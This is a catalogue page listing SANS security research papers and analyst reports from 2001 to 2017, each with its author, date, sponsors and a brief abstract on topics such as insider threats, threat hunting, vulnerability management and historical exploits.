- Sponsored By: Qualys Mcafee LLC FireEye Cylance
Endpoints, and the users behind them, are on the front lines of the battle: Together they represent the most significant entry points for attackers obtaining a toehold into the corporate network. Users are also the best detection tool organizations have against real threats, according to the 2017 SANS Threat Landscape survey. Read on for more detail on the types of attacks occurring and their impact on organizations and their security.
-
Road Map to a Secure, Smart Infrastructure Analyst Paper (requires membership in SANS.org community)
by Barbara Filkins - August 9, 2017
- Associated Webcasts: Roadmap to a Secure Smart Infrastructure
- Sponsored By: Rapid7 Inc.
This paper provides a multifaceted security approach for securing infrastructure systems that are being targeted by attackers and malware.
-
Defending Against the Wrong Enemy: 2017 SANS Insider Threat Survey Analyst Paper (requires membership in SANS.org community)
by Eric Cole - July 31, 2017
- Associated Webcasts: The SANS 2017 Insider Threat Survey: Mounting an Effective Defense Against Insider Threat
- Sponsored By: Rapid7 Inc. Dtex Systems Haystax Technology
It is easy, while evaluating attack vectors, researching competitors and gauging the threat from organized crime or foreign adversaries, to conclude that external attacks should be the primary focus of defense. This conclusion would be wrong. The critical element is not the source of a threat, but its potential for damage. This survey highlights the importance of managing internal threats as the key to winning at cyber security.
-
Hacking the CAN Bus: Basic Manipulation of a Modern Automobile Through CAN Bus Reverse Engineering SANS.edu Graduate Student Research
by Roderick Currie - June 20, 2017
The modern automobile is an increasingly complex network of computer systems. Cars are no longer analog, mechanical contraptions. Today, even the most fundamental vehicular functions have become computerized. And at the core of this complexity is the Controller Area Network, or CAN bus. The CAN bus is a modern vehicle's central nervous system upon which the majority of intra-vehicular communication takes place. Unfortunately, the CAN bus is also inherently insecure. Designed more than 30 years ago, the CAN bus fails to implement even the most basic security principles. Prior scholarly research has demonstrated that an attacker can gain remote access to a vehicle's CAN bus with relative ease. This paper, therefore, seeks to examine how an attacker already inside a vehicle's network could manipulate the vehicle by reverse engineering CAN bus communications. By providing a reproducible methodology for CAN bus reverse engineering, this paper also serves as a basic guide for penetration testers and automotive security researchers. The techniques described in this paper can be used by security researchers to uncover vulnerabilities in existing automotive architectures, thereby encouraging automakers to produce more secure systems going forward.
-
Speed and Scalability Matter: Review of LogRhythm 7 SIEM and Analytics Platform Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - April 13, 2017
- Associated Webcasts: Speed and Scalability Matter: SANS Review of LogRhythm 7 SIEM and Analytics Platform
Just how scalable, fast and accurate are SIEM tools when under load? To find out, we put the LogRhythm 7.2 Threat Lifecycle Management Platform to the test. We found that its clustered Elasticsearch indexing layer supported large log volumes of security and event data during simulated events that would require investigation and remediation.
-
Cyber Threat Intelligence Uses, Successes and Failures: The SANS 2017 CTI Survey Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - March 14, 2017
- Associated Webcasts: Cyber Threat Intelligence in Action - Skills and Implementations: Results of the 2017 Cyber Threat Intelligence Survey Part 1; Cyber Threat Intelligence in Action - Effectiveness of CTI Programs and Wish Lists for the Future: Results of the 2017 Cyber Threat Intelligence Survey Part 2
- Sponsored By: Arbor Networks Rapid7 Inc. Lookingglass Cyber Solutions, Inc. Anomali DomainTools ThreatConnect
Respondents' biggest challenges to effective implementation of cyber threat intelligence (CTI) are lack of trained staff, funding, time to implement new processes, and technical capability to integrate CTI, as well as limited management support. Those challenges indicate a need for more training and easier, more intuitive tools and processes to support the use of CTI in today's networks. These and other trends and best practices are covered in this report.
-
DevSecOps Transformation: The New DNA of Agile Business Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - February 21, 2017
This is an additional resource that accompanies the analyst paper "The DevSecOps Approach to Securing Your Code and Your Cloud".
-
PLC Device Security - Tailoring needs by Wen Chinn Yew - February 15, 2017
Programmable Logic Controllers (PLCs) are widely used in many industries. With increasing concern and interest in the security of these controllers and their impact on those industries, there is a growing trend to integrate security directly into them. It is not realistic or wise to have a one-size-fits-all solution. This paper presents focus areas and requirements suited to the various classes of PLCs on the market. It looks at the threats and vulnerabilities they face and the security solutions currently adopted. The paper then recommends how PLC vendors should apply different but extensible security solutions across the various classes of controllers in their product portfolio.
-
The DevSecOps Approach to Securing Your Code and Your Cloud Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - February 7, 2017
- Sponsored By: CloudPassage
DevSecOps, at heart, is about collaboration. More specifically, it is continual collaboration between information security, application development and IT operations teams. Having all three teams immersed in all development and deployment activities makes it easier for information security teams to integrate controls into the deployment pipeline, rather than causing delays or creating issues by bolting on security controls after systems are already running. Despite the potential benefits, getting started with DevSecOps will likely require some cultural changes and considerable planning, especially when automating the configuration and security of assets in the cloud. To help the shift toward a more collaborative culture, security teams need to integrate with the developers who are promoting code to cloud-based applications, to show they can bring quality conditions to bear on any production code push without slowing the process. Security teams should also work with QA and development to define the key qualifiers and parameters that need to be met before any code can be promoted. This paper also has an additional resource titled "DevSecOps Transformation: The New DNA of Agile Business".
-
Insider Threats and the Need for Fast and Directed Response Analyst Paper (requires membership in SANS.org community)
by Dr. Eric Cole - December 1, 2016
- Associated Webcasts: Insider Threats and the Real Financial Impact to Organizations - A SANS Survey
- Sponsored By: Veriato
As breaches continue to cause significant damage to organizations, security consciousness is shifting from traditional perimeter defense to a holistic understanding of what is causing the damage and where organizations are exposed. Although many attacks are from an external source, attacks from within often cause the most damage. This report looks at how and why insider attacks occur and their implications.
-
Taking Action Against the Insider Threat Analyst Paper (requires membership in SANS.org community)
by Eric Cole, PhD - October 5, 2016
- Associated Webcasts: Taking Action Against Insider Threats
- Sponsored By: Dtex Systems
Most organizations tend to focus on external threats, but insider threats are increasingly taking center stage. Insider threats come not only from the malicious insider, but also from infiltrators and unintentional insiders. Why are insider threats so common and why do they have such a significant impact? What is the difference between the different types of insider threats and the degree of risk they can constitute?
-
Intelligent Network Defense Analyst Paper (requires membership in SANS.org community)
by Jake Williams - September 8, 2016
- Associated Webcasts: Intelligent Network Security
- Sponsored By: ThreatSTOP
When an army invades a sovereign nation, one of the defenders’ first goals is to disrupt the invader’s command and control (C2) operations. The same is true when cyber attackers invade your network. Network defenders must prevent adversary communication, stopping the attack in its tracks while alerting the incident response (IR) team to the point of compromise and nature of the attack. Read on to learn more.
-
Generating Hypotheses for Successful Threat Hunting Analyst Paper (requires membership in SANS.org community)
by Robert M. Lee and David Bianco - August 15, 2016
Threat hunting is a proactive and iterative approach to detecting threats. Although threat hunters should rely heavily on automation and machine assistance, the process itself cannot be fully automated. One of the human's key contributions to a hunt is the formulation of a hypothesis to guide the hunt. This paper explores three types of hypotheses and outlines how and when to formulate each of them.
-
The SANS State of Cyber Threat Intelligence Survey: CTI Important and Maturing Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - August 15, 2016
- Associated Webcasts: The State of Cyber Threat Intelligence: Part 1: How Cyber Threat Intelligence Is Consumed and Processed; The State of Cyber Threat Intelligence: Part 2: The Value of CTI
- Sponsored By: Arbor Networks Hewlett Packard NETSCOUT Systems, Inc. Rapid7 Inc. AlienVault Anomali
It’s 2016, and the attacks (and attackers) continue to be more brazen than ever. In this threat landscape, the use of cyber threat intelligence (CTI) is becoming more important to IT security and response teams than ever before. This paper provides survey results along with advice and best practices for getting the most out of CTI.
-
Scalable Methods for Conducting Cyber Threat Hunt Operations SANS.edu Graduate Student Research
by Michael C. Long II - July 14, 2016
Information Security professionals commonly agree that organizations cannot prevent 100% of all cyber attacks. For this reason, organizations are encouraged to practice defense in depth so that if any one security measure fails, another will reduce the exposure and mitigate the impact. However, despite investing countless sums of money, manpower, and time into developing and maintaining a robust security infrastructure, organizations still struggle to identify and respond to cyber intrusions in a timely manner. Cyber Threat Hunt Teams have recently emerged as a proactive defense asset capable of methodically detecting and responding to advanced persistent threats that evade traditional rule or signature-based security solutions. This paper describes scalable methods and practices to plan and conduct cyber threat hunt operations throughout the enterprise.
-
Threat Hunting: Open Season on the Adversary Analyst Paper (requires membership in SANS.org community)
by Dr. Eric Cole - April 12, 2016
- Associated Webcasts: Open Season on Cyberthreats: Part I - Threat Hunting 101; Open Season on Cyberthreats: Part 2 - Threat Hunting Methodologies and Tools
- Sponsored By: HPE Carbon Black DomainTools Endgame Sqrrl Data, Inc. Malwarebytes
Nearly 86% of organizations responding to the survey want to be doing the hunting, albeit informally, as more than 40% do not have a formal threat hunting program in place. Results indicate that hunting is providing benefits, including finding previously undetected threats, reducing attack surfaces and enhancing the speed and accuracy of response. They also suggest that organizations want to improve their threat-hunting programs and realize more benefits from threat hunting.
-
Automated Network Defense through Threat Intelligence and Knowledge Management by Christopher O'Brien - January 4, 2016
Many organizations know that they should have cyber security threat intelligence, fewer know how to use it and fewer still are actually doing so.
-
Applying Data Analytics on Vulnerability Data by Yogesh Dhinwa - December 23, 2015
An organization with services spread across the globe depends on information technology and information systems. Adoption and compliance of information security standards have become mandatory for many organizations, especially those working under government regulations.
-
Understanding and Preventing Threats to Point of Sale Systems SANS.edu Graduate Student Research
by Richard Hummel - October 15, 2015
Data breaches have become a systemic problem in the retail, financial, and healthcare sectors, resulting in mass exfiltration of sensitive customer and/or patient data. These breaches continue to be a major problem for all sectors, but primarily for the retail sector. It has seen many different Point-of-Sale systems compromised, databases stolen, and customer data sold in underground forums. Many studies and white papers describe and analyze these breaches in detail, but fail to address all aspects of a single breach in one succinct article. As such, practitioners are only educated in part on the threats and the methods to mitigate these threats. This paper will cover three of the more prominent breaches, how the breaches occurred, how data was stolen, and actions organizations need to take to mitigate or, hopefully, eliminate the threats altogether.
-
Observation and Response: An Intelligent Approach Analyst Paper (requires membership in SANS.org community)
by J. Michael Butler - August 7, 2015
- Associated Webcasts: Tracking and Observation - How-To and What To Watch For
- Sponsored By: Anomali
A SANS Analyst Program whitepaper by J. Michael Butler. It discusses how properly focused observation and tracking efforts provide intelligence from inside the enterprise by monitoring for indicators of compromise such as odd point-in-time activities on the network, unusual machine-to-machine communications, outbound transfers, connection requests and many other suspicious activities.
-
Applying Lessons Learned for the Next Generation Vulnerability Management System by John Dittmer - June 8, 2015
The objective of this paper is to make recommendations for improving a vulnerability management system that is in development.
-
Using Software Defined Radio to Attack "Smart Home" Systems by Florian Eichelberger - May 1, 2015
The objective of this paper is to describe several plausible attacks that target "Smart-Home" systems using SDR platforms.
-
The Role of Static Analysis in Heartbleed by Jeff Sass - February 12, 2015
Numbered security vulnerabilities, known as Common Vulnerabilities and Exposures (CVEs), have been on the rise since the United States Computer Emergency Readiness Team (US-CERT) began tracking them in 1999.
-
Detecting Crypto Currency Mining in Corporate Environments by Jan D'Herdt - February 4, 2015
Crypto currencies [1] such as Bitcoin, Dogecoin, Primecoin, Litecoin, Riecoin and many others are digital currencies that do not follow the normal set of rules for currencies as we know them.
-
Automated Defense - Using Threat Intelligence to Augment by Paul Poputa-Clean - January 19, 2015
Threat Intelligence means different things to different people.
-
Point of Sale Systems and Security: Executive Summary Analyst Paper (requires membership in SANS.org community)
by Wes Whitteker - November 20, 2014
- Sponsored By: Carbon Black
The last year has seen scores of point of sale (POS) systems compromised by bad actors. In many cases, these environments were PCI-DSS compliant at the time of compromise. Executives seeking to protect their organizations and POS systems from compromise need to look beyond PCI-DSS and adopt a proactive "offense must inform defense" approach to POS security.
-
Creating a Threat Profile for Your Organization by Stephen Irwin - October 2, 2014
Developing a detailed threat profile provides organizations with a clear illustration of the threats that they face, and enables them to implement a proactive incident management program that focuses on the threat component of risk. Organizations are facing new types of advanced persistent threat (APT) scenarios that existing risk management programs are not able to evaluate completely and incident management programs are not able to defend against. This paper provides information about how to expand existing risk management models to better illustrate APTs and provides a framework for gathering threat-related information so that detailed threat profiles that include APTs can be developed for organizations.
-
Critical Security Controls: From Adoption to Implementation Analyst Paper (requires membership in SANS.org community)
by James Tarala - September 18, 2014
- Associated Webcasts: The Critical Security Controls: From Adoption to Implementation A SANS Survey
- Sponsored By: Qualys Tripwire, Inc. Mcafee LLC EiQnetworks
This SANS survey report explores how widely the CSCs are being adopted, as well as what challenges adopters are facing in terms of implementation of the controls and what they are looking for to improve their implementation practices.
-
MalwareD: A study on network and host based defenses that prevent malware from accomplishing its goals. by Dave Walters - September 17, 2014
Malware is an ever-growing problem on the Internet. Organizations struggle to prevent, detect, and respond to malware threats.
-
Insider Threats in Law Enforcement Analyst Paper (requires membership in SANS.org community)
by Dr. Eric Cole - September 4, 2014
- Associated Webcasts: Solving Insider Threats in Law Enforcement
- Sponsored By: Raytheon | Websense
Based on the valuable information they have at their disposal, law enforcement agencies are among those that are prime targets for advanced attacks. While network protection can be extensive and sophisticated, the exploitation of insiders poses a serious threat for illegal access to these agencies.
-
An Opportunity In Crisis by Harshit Nayyar - June 3, 2014
As the cliche saying goes, 'The Chinese word for Crisis contains a symbol for Opportunity'.
-
Improving Security Management with Real-Time Queries Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - April 2, 2014
- Associated Webcasts: The Value of On-Demand Endpoint Visibility
- Sponsored By: Mcafee LLC
A product review of McAfee Real Time Command with a focus on features and ease of use. Examination of its security-related features found the product to be surprisingly intuitive.
-
DDoS Attacks Advancing and Enduring: A SANS Survey Analyst Paper (requires membership in SANS.org community)
by John Pescatore - March 20, 2014
- Associated Webcasts: SANS Survey on Distributed Denial of Service
- Sponsored By: Corero
Survey on the state of DDoS readiness reveals more frequent and sophisticated DDoS attacks as well as lack of preparedness in many enterprises.
-
Framework for building a Comprehensive Enterprise Security Patch Management Program SANS.edu Graduate Student Research
by Michael Hoehl - January 2, 2014
The concept of a patch is pretty straightforward and broadly understood. In business terms, patching is a form of quality control and defect repair.
-
SANS Security Analytics Survey Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - October 1, 2013
- Associated Webcasts: SANS Analytics and Intelligence Survey Results Part I: The Risk Landscape
- Sponsored By: Guidance Software LogRhythm Hewlett Packard SolarWinds Hexis Cyber Solutions
Survey on the next generation of security tools shows that the market is in need of analytics and intelligence wrapped around the data that is being, or can be, collected in organizations.
-
Scaling Analytics to Meet Real-Time Threats in Large Enterprises: A Deep Dive into LogRhythm's Security Analytics Platform Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - September 10, 2013
- Associated Webcasts: Under Pressure: Scaling Analytics to Meet Real-Time Threats
- Sponsored By: LogRhythm
Evaluation of LogRhythm’s real-time analytics capabilities.
-
How DDoS Detection and Mitigation Can Fight Advanced Targeted Attacks Analyst Paper (requires membership in SANS.org community)
by John Pescatore - September 5, 2013
- Associated Webcasts: How to Fight the Real DDoS Threat
- Sponsored By: Arbor Networks
Exploration of how DDoS is used as part of advanced targeted attacks (ATAs) and description of how DDoS detection and prevention tools and techniques can also be used against ATAs.
-
Protecting Small Business Banking by Susan Bradley - July 22, 2013
Over the last several years, the use of online banking and other financial transactions has risen dramatically.
-
Implementing a Vulnerability Management Process by Tom Palmaers - April 9, 2013
A vulnerability is defined in the ISO 27002 standard as "A weakness of an asset or group of assets that can be exploited by one or more threats" (International Organization for Standardization, 2005).
-
Beyond Continuous Monitoring: Threat Modeling for Real-time Response Analyst Paper (requires membership in SANS.org community)
by Mark Hardy - October 13, 2012
- Sponsored By: SecurityCoverage
Threat modeling, through timely and accurate inputs, can be used by enterprises to mitigate and defeat attack scenarios before they fully unfold.
-
Exploiting Financial Information Exchange (FIX) Protocol? by Darren DeMarco - July 3, 2012
The FIX Protocol website defines The Financial Information eXchange ("FIX") Protocol as “a series of messaging specifications for the electronic communication of trade-related messages” (FIX Protocol Ltd, 2012).
-
Covert Channels Over Social Networks by Jose Selvi - June 4, 2012
Today we live in a malware age, with the malware industry growing exponentially (AV-Test, 2012).
-
Robots.txt by Jim Lehman - May 31, 2012
Every minute of every day the web is searched, indexed and abused by web Robots; also known as Web Wanderers, Crawlers and Spiders.
-
APT Dot Gov: Protecting Federal Systems from Advanced Threats Analyst Paper (requires membership in SANS.org community)
by G. Mark Hardy - October 31, 2011
- Sponsored By: F5 Networks, Inc.
This paper describes advanced threats against federal and other governmental systems and provides advice on how to identify and protect the data at risk.
-
BYOB: Build Your Own Botnet by Francois Begin - August 17, 2011
A recent report on botnet threats (Dhamballa, 2010) provides a sobering read for any security professional. According to its authors, the number of computers that fell victim to botnets grew at the rate of 8%/week in 2010, which translates to more than a six-fold increase over the course of the year.
-
Reducing Organizational Risk Through Virtual Patching by Joseph Faust - January 11, 2011
Software patching for IT departments across the organizational landscape has always been an integral part of maintaining functional, usable and stable software. Historically, the traditional patch cycle has been focused on fixing or resolving issues which affect functionality. In recent years, with the advancement of more sophisticated and targeted threats which are occurring in quicker cycles, this focus is dramatically changing (Risk Assessment - Cisco, n.d.; Executive Office of The United States, 2005). Corporations and government now have a greater understanding of the potential losses and expenses incurred by not maintaining application security and are moving towards an increased focus on patching and security (Epstein, Grow & Tschang, 2008). With organizations' reputations, consumer confidence and corporate secrets at risk, corporations and government are recognizing the need to shift and address vulnerabilities at a much faster pace than they historically have (Chan, 2004). Over roughly the last ten years, the length of time between the documentation of a given vulnerability in a piece of software and the development of an actual exploit that can take advantage of the weakness in the application has decreased tremendously. According to Andrew Jaquith, senior analyst at Yankee Group, the average time between vulnerability discovery and the release of exploit code is less than one week ("Shrinking time from," 2006). It has also been identified that "99% of intrusions result from exploitation of known vulnerabilities or configuration errors where countermeasures were available" ("Risk reduction and.," 2010). Clearly these statistics alone can prove daunting for many businesses trying to keep pace and maintain proper defenses against the bad guys.
-
Malicious Android Applications: Risks and Exploitation by Joany Boutet - December 22, 2010
Android is an open-source mobile operating system, based upon a modified version of the Linux kernel, initially developed by Android Inc., a firm purchased by Google in 2005. A Gartner study released in November 2010 outlined that Android has become the second-most popular OS in the world (Gartner, 11/2010). The growth of Android has exceeded their previous study, released last year, in which they had predicted that Android would be the No. 2 worldwide mobile operating system in 2012 (The H, 08/10/2009). According to another Gartner study (Gartner, 08/2010), there will be only a slight difference between Symbian and Android market share in 2014: 30.2% for Symbian against 29.6% for Android.
-
USB - Ubiquitous Security Backdoor SANS.edu Graduate Student Research
by Erik Couture - August 25, 2009
The Universal Serial Bus (USB) is an omnipresent data and peripheral communication port that poses a security threat in any modern computing environment. Proposed is a holistic approach to USB port security, examining the problem from user requirements definition to organizational threat-risk assessment and finally technical and procedural risk mitigation.
-
Threat Analysis of Allowing Employee Internet Access SANS.edu Graduate Student Research
by Mason Pokladnik - March 28, 2008
The ISO 17799/27001 standard provides a good minimum description of what organizations should be doing to protect themselves, but it should not be the sole focus of your security and audit control design. A better approach is to allow your information-security management-system subcommittees or technical specialists to analyze the threats your organization is likely to face. Then, design your controls around those threats, balancing the cost to mitigate a threat against the cost of a threat occurring in your environment. Finally, after you have analyzed the threats, you can double-check your policies and procedures against a regulatory or management framework, such as ISO 17799, SOX, GLBA, HIPAA or PCI.
-
Attack vs. Defense on an Organizational Scale by Omar Fink - December 11, 2007
Historically, the motivation behind most cyber attacks was similar to graffiti, in that the main purpose was to make a mark on somebody else’s territory, to demonstrate technical skill by compromising a web server and defacing the main page, with the primary goal seeming to be simply to make a statement of existence. In recent years, this has evolved to being more concerned about making a profit or creating a political impact.
-
ANI vulnerability: History repeats by Shashank Gonchigar - October 24, 2007
Animated cursors (.ani files) are used to change the appearance of the mouse pointer to an animation. A common example is the mouse pointer turning into an hourglass when the processor is busy. In March 2007 a quite severe vulnerability was announced. It was subsequently exploited because of a flaw in the code which handled these files. This paper is a discussion of the ANI header buffer overflow vulnerability (Microsoft Security Bulletin MS07-017 - CVE-2007-0038). As we progress, we will understand what caused this vulnerability, analyze an exploit (PoC), understand the heap spraying technique employed by this exploit and finish with the incident handling process.
-
A System of Persistent Baseline Automated Vulnerability Scanning and Response in a Distributed University Environment by Chet Langin - September 18, 2007
This paper describes and analyzes a persistent automated baseline vulnerability scanning procedure in a university (“The University”), including preparation, response, and follow up procedures. A Ruby script called run_nxscan.rb, written by the author, runs the nxscan scanning tool (York University, 2007) and processes the output. But this paper is more about the overall system used than just about a script and the nxscan tool. See Wack, Tracy, and Souppaya (2003) for a list of some other vulnerability scanning tools.
-
Malware Analysis: Environment Design and Architecture by Adrian Sanabria - August 2, 2007
The goal of this paper is to discuss the architecture and design necessary to create an effective malware analysis lab environment, and to explore possibilities beyond the traditional two or three system VM-based lab.
-
Visually Assessing Possible Courses of Action for a Computer Network Incursion by Grant Vandenberghe - June 15, 2007
This study has suggested that an additional course of action step be added to the incident handling process. This addition would require that an incident handler identify the effects of his action before disrupting ongoing commercial or military operations.
-
A Survey of Wireless Mesh Networking Security Technology and Threats by Anthony Gerkis - October 18, 2006
This paper will summarize the technologies and challenges related to wireless mesh networks.
-
Exploiting BlackICE When a Security Product has a Security Flaw by Peter Gara - July 9, 2005
This paper contains a fictional story about a computer expert who gets into evil ways and tries to denigrate his ex-colleague at her new workplace.
-
A Spyware Survival Toolkit by Peter McGranaghan - May 17, 2005
This paper will discuss the sources of spyware, the types of spyware, and methods of prevention, detection, and removal of spyware.
-
What is Santy bringing you this year? by Pieter Danhieux - May 5, 2005
This early and evil "Santa Claus" present caused some serious havoc for administrators of phpBB bulletin board software around Christmas 2004, defacing almost 40 thousand phpBB sites in a short period.
-
Phishing: An Analysis of a Growing Problem by Anthony Elledge - July 25, 2004
Email has become an invaluable communication tool for both business and personal use. Among the many security issues that now affect computer users, there is a growing threat known as "phishing".
-
Electronic Toll Collection by Don Flint - July 25, 2004
Since 1992 active Radio Frequency Identification (RFID) tags have been used in vehicles to automate the toll process on toll roads, bridges, and tunnels in a process called Electronic Toll Collection (ETC). These tags are mounted to the windshield or externally surrounding the license plate on a vehicle and read as the vehicle proceeds without stopping through special lanes at the toll plaza.
-
Risk-Eye for the IT Security Guy by Thomas Siu - May 2, 2004
An enterprise risk management workflow model is presented to illustrate the "big picture" of risk management, the key to developing a "keen eye" for IT security risks as a part of the overall IT management doctrine.
-
Skimming and Its Side Effects by Nobie Cleaver - March 9, 2004
What I have learned in my research has truly amazed me and I endeavor to share some of that information in this paper. I will define skimming, describe what a skimming device may look like, discuss how skimming is done, provide some statistical information and provide some pointers on how to avoid being skimmed and what to do if it happens.
-
Vulnerability Management: Tools, Challenges and Best Practices by Cathleen Brackin - December 13, 2003
This paper will outline the key steps to Vulnerability Management, and provide an in-depth look at the tools, challenges and best practices of each part of the VM lifecycle.
-
Managing vulnerabilities exposed by Windows services. by James Williams - November 6, 2003
This paper looks at the vulnerabilities exposed by Windows services, how and why these risks occur, identifies the tools for manipulating Windows services, and provides solutions to secure these identified vulnerabilities.
-
Corporate Anti-Virus Protection - A Layered Approach by Elizabeth Peyton - November 6, 2003
This paper offers a "defense-in-depth" solution for large enterprises and corporations where there may be thousands of entry points through which viruses can enter, causing possible system damage and information theft or loss.
-
Examining the RPC DCOM Vulnerability: Developing a Vulnerability-Exploit Cycle by Kevin OShea - October 6, 2003
This paper proposes to build on the vulnerability life-cycle work first proposed by Arbaugh, Fithen and McHughi to establish a detailed framework for vulnerability analysis.
-
Vulnerabilities & Vulnerability Scanning by Ken Houghton - September 8, 2003
This white paper will discuss the benefits and pitfalls of Vulnerability Scanning and will suggest an approach suitable for small and medium-sized businesses, as well as discussing the possibility of buying this as a service from a specialist agency.
-
Assessing Threats To Information Security In Financial Institutions by Cynthia Bonnette - August 8, 2003
This paper explores key issues related to threat assessment, including essential elements, methodologies, and common pitfalls, along with a recommended approach for completing and documenting this activity.
-
Printer Insecurity: Is it Really an Issue? by Vernon Vail - August 8, 2003
This document starts with a brief look at basic system and network security principles, continues with the revealing of some printer threats and vulnerabilities, and ends with a discussion about how to deal with the issue.
-
Anatomy of an IP Fragmentation Vulnerability in Linux IPChains: Investigating Common Vulnerabilities and Exposures (CVE) Candidate Vulnerability CAN-1 by Karim Sobhi - July 14, 2003
This paper investigates a potential IP fragmentation vulnerability in Linux IPChains.
-
Vulnerability naming schemes and description languages: CVE, Bugtraq, AVDL and VulnXML by Michael Rohse - May 30, 2003
These limitations inspired two new proposals: AVDL (Application Vulnerability Description Language) and VulnXML. With them it will be possible to directly import a describing XML document into a scanning tool and the tool will generate and launch the vulnerability scan. AVDL and VulnXML will be described and discussed in this paper.
-
10 Vulnerabilities a Scanner Might Not Find by Jeffrey King - May 12, 2003
This paper particularly serves as a resource to those who are new to the information assurance field, and provides insight into two common protocols used in Internet security.
-
Beyond Conventional Terrorism...The Cyber Assault by Rajeev Puran - April 6, 2003
The text presented in this practical write up is established to review the various intents, events, acts and possibilities of computing technology based terrorism and warfare.
-
Worms as Attack Vectors: Theory, Threats, and Defenses by Matthew Todd - February 22, 2003
This paper provides a brief discussion of what constitutes a typical worm, along with a brief history, reasons they may be released, and who might gain from their use.
-
How do we define Responsible Disclosure? by Stephen Shepherd - February 19, 2003
This paper explores some key events in vulnerability disclosure, the conceptual differences between full disclosure, nondisclosure, limited disclosure and responsible disclosure, then examines some existing disclosure policies and proposed standards.
-
Security for Online Transaction Processing in a White Label Financial Switch by Fabian Soler - December 28, 2002
White label financial switches have introduced automatic banking machines (ABMs) in niche markets by taking advantage of cheap modern network and PC technology.
-
A New Generation of File Sharing Tools by Dan Klinedinst - December 15, 2002
Excessive file sharing can have serious effects on a variety of organizations, from lost revenue to lost productivity and wasted resources.
-
Large Scale Network Incidents - What Can We Do? by Jay Garden - December 10, 2002
This paper looks into the similarities between the two types of attacks and discusses ways to mitigate the risk from an Internet-wide perspective.
-
Potential Vulnerabilities of Timbuktu Remote Control Software by David Batz - October 9, 2002
This paper is neither for nor against the use of Timbuktu software as a Windows Remote Access/Remote Control solution; however, there are a number of potentially serious vulnerabilities that may be encountered through the use of the product.
-
Cyber Scam Artists: A New Kind of .con by Robert Fried - June 12, 2002
This paper will closely examine the emergence of the fraudster into cyberspace and analyze the steps being taken to help deal with the issue of online fraud.
-
Buffer Overflows for Dummies by Josef Nelißen - May 1, 2002
This paper tries to fill the gap between Buffer Overflows and errors within program source code, providing an in-depth discussion on stack smashing, frame pointer overwrite, return-into-libc, heap based overflow techniques and possible countermeasures.
-
SSL Man-in-the-Middle Attacks by Peter Burkholder - February 1, 2002
This paper examines the mechanics of the SSL protocol attack, then focuses on the greater risk of SSL attacks when the client is not properly implemented or configured.
-
The Instant Messaging Menace: Security Problems in the Enterprise and Some Solutions by Dan Frase - January 31, 2002
In this paper, the security threats posed by the use of consumer-grade instant messaging clients in the enterprise are discussed, including privacy and identity issues, malware, and bug vulnerabilities.
-
Cross-Sight Scripting Vulnerabilities by Mark Shiarla - January 9, 2002
This paper states that cross-site scripting is a potential risk for most Web servers.
-
ICMP Attacks Illustrated by Christopher Low - December 11, 2001
This paper shows how ICMP can and has been used in many phases of an attacker's advance in a system compromise.
-
Remote Access White Paper by Ken Stasiak - November 28, 2001
This paper looks at remote access security issues, pointing to how a remote access solution can reduce administration time and increase security.
-
Internal Threat - Risks and Countermeasures by Jarvis Robinson - November 15, 2001
This paper covers the risks associated with insider threat, and provides practical countermeasures, which should challenge the reader to focus on the people and processes that protect information rather than technology.
-
Address Resolution Protocol Spoofing and Man-in-the-Middle Attacks by Robert Wagner - September 27, 2001
This paper is designed to introduce and explain ARP spoofing.
-
Analysis of FTP Hijack by Phong Huynh - September 19, 2001
This paper demonstrates how historical lessons can improve our skills as InfoSec professionals and can be used as a platform for management to understand the technology solutions we are proposing.
-
Outsourcing and the Increased Dangers of 'Dial Up' Access by Paul Jenkinson - September 15, 2001
The objective of this paper is to highlight how the current trend of outsourcing support services can dangerously augment the already well-known issues surrounding dial-up access to a corporate network.
-
Spoofed IP Address Distributed Denial of Service Attacks: Defense-in-Depth by Steven Bass - September 12, 2001
The purpose of this paper is to look at a defense-in-depth approach to spoofed IP address DDoS attacks, including known defenses, new techniques, and recent developments.
-
Free InfoSec Training, Compliments of History by Chris Bachmann - August 21, 2001
This paper demonstrates how historical lessons can be used as a platform for management to understand the technology solutions we are proposing and how historical lessons can improve our skills as InfoSec professionals.
-
Peer-to-Peer Security and Intel's Peer-to-Peer Trusted Library by Chris McKean - August 20, 2001
This paper examines a code library released by Intel that software developers can use to strengthen the security of, and add "trust" to, new peer-to-peer applications.
-
Instant Messaging: How Secure Is It? by Susan Willner - August 19, 2001
This paper describes Instant Messaging, a popular method of communication, and the security issues that should be considered when using it.
-
The Changing Face of Distributed Denial of Service Mitigation by Justin Stephen - August 16, 2001
This paper reviews traditional best practices and tools for DDoS mitigation, discusses the inherent weaknesses of these best practices, the developing legal issues and trends that may soon be forcing change on how DDoS attacks are combated, and looks at the new generation of tools becoming available for mitigating these attacks.
-
Defending Against Code Red II Using Symantec NetProwler and Intruder Alert, ddos by Kenneth Donze - August 15, 2001
In this paper I will address the use of Symantec's NetProwler, a network-based IDS (NIDS), and Intruder Alert, a host-based IDS (HIDS), to detect and react to the Code Red II worm.
-
Electromagnetic Attack: Is Your Infrastructure and Data at Risk? by Michael Hayden - August 10, 2001
Attack of the infrastructure by way of radio frequency devices is technically possible and has been demonstrated on a small scale.
-
Unicode Vulnerability - How & Why? by Andrew Brannan - August 7, 2001
This paper discusses how the power and flexibility of the Unicode vulnerability make it one of the most popular, and therefore dangerous, vulnerabilities currently used by attackers today.
-
An Overview of Gnutella by Brenda Batkins - July 27, 2001
This document addresses origins of Gnutella, what it is and how it works as well as some Gnutella-compatible software, along with possible security concerns.
-
Cyber-stalking, Privacy Intrusion at Its Scariest by Pamela Valentine - July 27, 2001
This paper describes Cyber-stalking and what you can do, or not do, to prevent it.
-
Vulnerability Assessments: The Pro-active Steps to Secure Your Organization by Robert Boyce - July 12, 2001
This paper provides an in-depth look at vulnerability assessments and discusses pro-active steps to secure your organization.
-
Kernel Rootkits by Dino Zovi - July 4, 2001
This paper provides an in-depth discussion on kernel rootkits.
-
Big Brother is Watching: An Update on Web Bugs by Steve Nichols - July 3, 2001
This paper discusses various types of script and executable web bugs that can retrieve almost any information the programmer wishes to obtain from the user's computer.
-
Aspects of Biological Evolution and Their Implications for Unix Computer Security by Michael Folsom - July 3, 2001
This paper presents aspects of biological evolution and their implications for Unix computer security.
